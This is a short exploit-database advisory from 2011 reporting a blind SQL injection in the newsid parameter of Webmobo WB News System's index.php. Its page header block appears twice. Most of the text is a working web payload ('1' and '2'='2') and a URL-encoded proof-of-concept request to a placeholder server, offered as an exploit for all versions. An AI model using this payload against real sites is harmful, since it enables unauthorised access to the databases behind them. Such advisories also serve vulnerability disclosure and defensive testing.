Webmobo WB News System Blind SQL Injection
| EKU-ID: 926 | CVE: | OSVDB-ID: |
| Author: Eyup CELIK | Published: 2011-09-06 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 926 | CVE: | OSVDB-ID: |
| Author: Eyup CELIK | Published: 2011-09-06 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
# Exploit Title: Webmobo News System Blind SQL Injection
# Date: 2011
# Author: Eyup CELIK
# Version: All Version
# Tested on: All versions are Vulnerability
# Web Site: www.eyupcelik.com.tr
ISSUE
Blind SQL Injection can be done using the command input
Vulnerable Page:
index.php
Example:
index.php?action=sendto&newsid=<Blind SQL Injection Code>
Exploit:
index.php?action=sendto&newsid=1' and '2'='2
POC:
http://server/index.php?action=sendto&newsid=1%27%20and%20%272%27=%272
Thanks,
Eyup CELIK
Information Technology Security Specialist
http://www.eyupcelik.com.tr